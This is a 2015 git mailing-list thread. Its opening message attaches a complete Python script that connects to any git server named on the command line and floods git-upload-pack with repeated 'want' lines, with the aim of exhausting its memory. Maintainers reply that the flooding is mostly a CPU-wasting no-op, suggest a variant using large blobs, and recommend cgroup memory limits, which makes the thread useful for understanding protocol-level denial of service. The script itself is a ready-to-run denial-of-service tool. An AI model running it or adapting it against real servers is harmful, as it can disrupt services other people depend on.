arbitrary memory allocation

* arbitrary memory allocation
@ 2015-11-26  4:06 ytrezq
  2015-12-01  0:17 ` Junio C Hamano
  2015-12-02  6:09 ` Jeff King
  0 siblings, 2 replies; 4+ messages in thread
From: ytrezq @ 2015-11-26  4:06 UTC (permalink / raw)
  To: git

[-- Attachment #1: Type: text/plain, Size: 187 bytes --]

Hello,

First, something I still don't understand: should I always ulimit RAM
usage for security purposes when I manage a public server?

If not, you may find the attachment interesting.

[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #2: git-clone.py --]
[-- Type: text/x-python; name="git-clone.py", Size: 2736 bytes --]

#!/usr/bin/python
from socket import *
import sys,time
if len(sys.argv)!=3:
	print "Ok, it is not a real memory leak, but it can be used against any public git server.\nAn http version of this script would benefit from a large zlib compression ratio, allowing it to fill the RAM 200 times faster, as with ssh"
	print ""
	print "usage"
	print "argv1 is the target domain name or address"
	print "argv2 is the path to a non-empty repo with at least 2 refs"
	print ""
	print "for example git://somesite.com/git/linux.git would become"
	print sys.argv[0] + " somesite.com /git/linux.git"
	exit(1)

sockobj = socket(AF_INET, SOCK_STREAM)
sockobj.connect((sys.argv[1],9418))
path="git-upload-pack "+sys.argv[2]+"\0host="+sys.argv[1]+'\0' # request a clone
sockobj.send(format(len(path)+4,'04x')+path) # see the git documentation for more information about the pkt-line format

# Even when blocking, socket.recv may return fewer bytes than requested
def full_read(length):
	buf=sockobj.recv(length)
	while len(buf)<length:
		chunk=sockobj.recv(length-len(buf)) # ask only for what is still missing
		if not chunk: # the peer closed the connection
			break
		buf+=chunk
	return buf

obj=[full_read(int(full_read(4),16)-4)]
pkt_line_length=int(full_read(4),16)-4 # length of a packet in pkt-line format (4 ASCII hex digits), minus the 4-byte prefix itself
while pkt_line_length>0:
	obj.append(full_read(pkt_line_length))
	pkt_line_length=int(full_read(4),16)-4
	if sys.getsizeof(obj)>150000: # Don't make the same mistake as the official git project: limit our RAM usage
		time.sleep(1)
		sockobj.recv(10000) # be sure git-upload-pack is ready to receive
		break

first_line="want "+obj[0][:40]+" multi_ack_detailed side-band-64k thin-pack ofs-delta agent=git/2.9.2\n" # The first line has a different format
sockobj.send(format(len(first_line)+4,'04x')+first_line) # send it in the pkt-line format

line_list="0032want "+obj[1][:40]+'\n'
while len(line_list)<65430: # Get the ideal tcp packet size for fastest bandwidth (64Ko)
	for i in obj:
		if (i==obj[0]) or (i==obj[1]) or ("pull" in i):
			continue
		line_list+="0032want "+i[:40]+'\n'
		if len(line_list)>65480:
			break


# struct object (see object.h line 47)
# unsigned int
# unsigned int
# unsigned int
# unsigned int
# unsigned char binary_sha[20]

# objects=object +
# char *=NULL (64 bit int)
# char *=NULL (64 bit int)
# unsigned mode
line_list_len=line_list.count('\n')*56 # Line lengths of the pkt-line format won't fill the ram, so remove them from the size counter
count=line_list_len
while True:
	sys.stdout.flush()
	sockobj.send(line_list) # for each line, the git-upload-pack process appends a member to a struct object array
	print("\r%.2f Mo of ram filled" % float(count/float(1048576))),
	count+=line_list_len

* Re: arbitrary memory allocation
  2015-11-26  4:06 arbitrary memory allocation ytrezq
@ 2015-12-01  0:17 ` Junio C Hamano
  2015-12-01  1:03   ` Stefan Beller
  2015-12-02  6:09 ` Jeff King
  1 sibling, 1 reply; 4+ messages in thread
From: Junio C Hamano @ 2015-12-01  0:17 UTC (permalink / raw)
  To: ytrezq; +Cc: git

ytrezq@sdf-eu.org writes:

> line_list="0032want "+obj[1][:40]+'\n'
> while len(line_list)<65430: # Get the ideal tcp packet size for fastest bandwidth (64Ko)
> 	for i in obj:
> 		if (i==obj[0]) or (i==obj[1]) or ("pull" in i):
> 			continue
> 		line_list+="0032want "+i[:40]+'\n'
> 		if len(line_list)>65480:
> 			break
> ...
> line_list_len=line_list.count('\n')*56 # Line lengths of the pkt-line format won't fill the ram, so remove them from the size counter
> count=line_list_len
> while True:
> 	sys.stdout.flush()
> 	sockobj.send(line_list) # for each line, the git-upload-pack process appends a member to a struct object array
> 	print("\r%.2f Mo of ram filled" % float(count/float(1048576))),
> 	count+=line_list_len

This seems to be attempting to throw "want XXXXXXXX" that are
outside the original server-side advertisement over and over.  Even
though the set of distinct "want" lines you can throw at the server
is bounded by the server-side advertisement (i.e. usually you won't
be able to throw an object name that does not appear at the tip), by
repeating the requests, you seem to be hoping that you can exhaust
the object_array() used in upload-pack.c::receive_needs().
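
For reference, the "0032want ..." framing used by the script is the
pkt-line format: four ASCII hex digits giving the total length (prefix
included), followed by the payload. A minimal Python sketch of that
framing follows; the helper names pkt_line and read_pkt_lines are
hypothetical and are not taken from git's sources.

```python
MAX_PKT_LINE = 65520  # largest total pkt-line length allowed by the protocol


def pkt_line(payload: bytes) -> bytes:
    """Frame a payload as one pkt-line: 4 hex digits of total length, then data."""
    total = len(payload) + 4  # the length prefix counts its own 4 bytes
    if total > MAX_PKT_LINE:
        raise ValueError("payload too long for a single pkt-line")
    return format(total, "04x").encode("ascii") + payload


def read_pkt_lines(data: bytes):
    """Yield payloads from concatenated pkt-lines; None marks a flush packet."""
    pos = 0
    while pos < len(data):
        length = int(data[pos:pos + 4], 16)
        if length == 0:  # "0000" is the flush packet and carries no payload
            yield None
            pos += 4
            continue
        if length < 4 or pos + length > len(data):
            raise ValueError("malformed pkt-line")
        yield data[pos + 4:pos + length]
        pos += length


# "want " (5) + 40 hex digits + "\n" (1) + 4-byte prefix = 50 = 0x32
want = pkt_line(b"want " + b"0" * 40 + b"\n")
print(want[:4])  # b'0032'
```

This is why every non-first "want" line in the script starts with
"0032".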

But does that attack actually work?  After seeing these "want"
lines, the object name read from there goes through this code:

		o = parse_object(sha1_buf);
		if (!o)
			die("git upload-pack: not our ref %s",
			    sha1_to_hex(sha1_buf));
		if (!(o->flags & WANTED)) {
			o->flags |= WANTED;
			if (!is_our_ref(o))
				has_non_tip = 1;
			add_object_array(o, NULL, &want_obj);
		}

So it appears to me that the requests the code makes in the second
and subsequent iterations of "while True:" loop would merely be an
expensive no-op, without bloating memory footprint.

It does waste CPU cycles and a network socket, though.
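
The effect of the WANTED flag check can be modelled in a few lines of
Python. This is only a sketch of the logic quoted above, not git's
code: the Obj class, the receive_wants function, the flag value and
the dict standing in for parse_object() are all assumptions made for
illustration.

```python
WANTED = 1 << 0  # hypothetical bit value; only its role as a flag matters here


class Obj:
    """Stand-in for git's struct object: a name plus a flags word."""

    def __init__(self, name):
        self.name = name
        self.flags = 0


def receive_wants(want_names, known_objects):
    """Collect wanted objects, adding each object at most once."""
    want_obj = []
    for name in want_names:
        o = known_objects.get(name)  # plays the role of parse_object()
        if o is None:
            raise ValueError("not our ref %s" % name)
        if not (o.flags & WANTED):   # the first "want" for this object
            o.flags |= WANTED
            want_obj.append(o)       # repeated names never reach this line
    return want_obj


known = {name: Obj(name) for name in ("a" * 40, "b" * 40)}
repeated = ["a" * 40, "b" * 40] * 1000  # 2000 want lines, 2 distinct objects
want_obj = receive_wants(repeated, known)
print(len(want_obj))  # 2
```

However many times the same names are sent, the array grows only to
the number of distinct objects.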

* Re: arbitrary memory allocation
  2015-12-01  0:17 ` Junio C Hamano
@ 2015-12-01  1:03   ` Stefan Beller
  0 siblings, 0 replies; 4+ messages in thread
From: Stefan Beller @ 2015-12-01  1:03 UTC (permalink / raw)
  To: Junio C Hamano; +Cc: ytrezq, git@vger.kernel.org

On Mon, Nov 30, 2015 at 4:17 PM, Junio C Hamano <gitster@pobox.com> wrote:
> ytrezq@sdf-eu.org writes:
>
>> line_list="0032want "+obj[1][:40]+'\n'
>> while len(line_list)<65430: # Get the ideal tcp packet size for fastest bandwidth (64Ko)
>>       for i in obj:
>>               if (i==obj[0]) or (i==obj[1]) or ("pull" in i):
>>                       continue
>>               line_list+="0032want "+i[:40]+'\n'
>>               if len(line_list)>65480:
>>                       break
>> ...
>> line_list_len=line_list.count('\n')*56 # Line lengths of the pkt-line format won't fill the ram, so remove them from the size counter
>> count=line_list_len
>> while True:
>>       sys.stdout.flush()
>>       sockobj.send(line_list) # for each line, the git-upload-pack process appends a member to a struct object array
>>       print("\r%.2f Mo of ram filled" % float(count/float(1048576))),
>>       count+=line_list_len
>
> This seems to be attempting to throw "want XXXXXXXX" that are
> outside the original server-side advertisement over and over.  Even
> though the set of distinct "want" lines you can throw at the server
> is bounded by the server-side advertisement (i.e. usually you won't
> be able to throw an object name that does not appear at the tip), by
> repeating the requests, you seem to be hoping that you can exhaust
> the object_array() used in upload-pack.c::receive_needs().
>
> But does that attack actually work?  After seeing these "want"
> lines, the object name read from there goes through this code:
>
>                 o = parse_object(sha1_buf);
>                 if (!o)
>                         die("git upload-pack: not our ref %s",
>                             sha1_to_hex(sha1_buf));
>                 if (!(o->flags & WANTED)) {
>                         o->flags |= WANTED;
>                         if (!is_our_ref(o))
>                                 has_non_tip = 1;
>                         add_object_array(o, NULL, &want_obj);

(Looking quickly), I do not see a deduplication in add_object_array,
so you could send the same want line again and again,
to inflate the want_obj array.

If you happen to know a large object in a well-known project
(some Linux blob, maybe?), it would be held lots of times in memory,
which may trigger the OOM killer on Linux?

>                 }
>
> So it appears to me that the requests the code makes in the second
> and subsequent iterations of "while True:" loop would merely be an
> expensive no-op, without bloating memory footprint.
>
> It does waste CPU cycle and network socket, though.

* Re: arbitrary memory allocation
  2015-11-26  4:06 arbitrary memory allocation ytrezq
  2015-12-01  0:17 ` Junio C Hamano
@ 2015-12-02  6:09 ` Jeff King
  1 sibling, 0 replies; 4+ messages in thread
From: Jeff King @ 2015-12-02  6:09 UTC (permalink / raw)
  To: ytrezq; +Cc: git

On Thu, Nov 26, 2015 at 05:06:35AM +0100, ytrezq@sdf-eu.org wrote:

> First, something I still don't understand, should I always ulimit ram
> usage for security purposes when I manage a public server?

You didn't define "public" here. For serving fetches, the memory tends
to be fairly bounded and dependent on the repo you're serving. For
accepting pushes, it's trivial to convince the server to allocate a lot
of memory (you can send an unbounded set of ref updates, or you can
simply send a 50GB object that compresses down to a tiny size).
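
The compression point is easy to reproduce with Python's zlib module.
The sketch below is an illustration only: the 10 MiB input and the
1 MiB limit are arbitrary, and bounded_inflate is a hypothetical helper
showing one way a receiver could cap inflated size, not something git
does.

```python
import zlib

raw = bytes(10 * 1024 * 1024)   # 10 MiB of zero bytes
packed = zlib.compress(raw, 9)  # highly repetitive input shrinks dramatically
print(len(raw), len(packed))


def bounded_inflate(data: bytes, limit: int) -> bytes:
    """Inflate a zlib stream, refusing to produce more than `limit` bytes."""
    d = zlib.decompressobj()
    out = d.decompress(data, limit + 1)  # never materialise more than limit + 1 bytes
    if len(out) > limit:
        raise ValueError("inflated size exceeds limit")
    if not d.eof:
        raise ValueError("truncated or corrupt zlib stream")
    return out


try:
    bounded_inflate(packed, 1024 * 1024)
except ValueError as err:
    print("rejected:", err)
```

The max_length argument of decompress() is what keeps the receiver from
allocating the full inflated size before it can decide to reject it.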

Git does not have any internal memory controls, and will generally rely
on malloc() to tell it when it is not being reasonable. I'd suggest
using OS-level memory controls like cgroups if you're hosting something
public.
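
cgroups are configured outside the process, so they are not shown
here. As a smaller illustration of the ulimit approach from the
original question, the sketch below caps a child's address space with
setrlimit() before it runs. It is Unix-only, run_with_memory_cap is a
hypothetical helper, and the 512 MiB cap is an arbitrary assumption;
the child here is a Python one-liner standing in for a server process.

```python
import resource
import subprocess
import sys


def run_with_memory_cap(argv, max_bytes):
    """Run argv with its address space (RLIMIT_AS) capped at max_bytes."""

    def apply_limit():
        # Runs in the child just before exec. Only the soft limit is lowered,
        # and never above the existing hard limit, so the call is permitted
        # for unprivileged users.
        _soft, hard = resource.getrlimit(resource.RLIMIT_AS)
        cap = max_bytes if hard == resource.RLIM_INFINITY else min(max_bytes, hard)
        resource.setrlimit(resource.RLIMIT_AS, (cap, hard))

    return subprocess.run(argv, preexec_fn=apply_limit, capture_output=True)


# The child tries to allocate 1 GiB under a 512 MiB cap; the allocation is
# refused and the interpreter exits with a non-zero status.
proc = run_with_memory_cap(
    [sys.executable, "-c", "bytearray(1 << 30)"],
    512 * 1024 * 1024,
)
print(proc.returncode)
```

With a limit in place, a runaway allocation fails inside the one
process instead of pushing the whole machine towards the OOM killer.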

-Peff
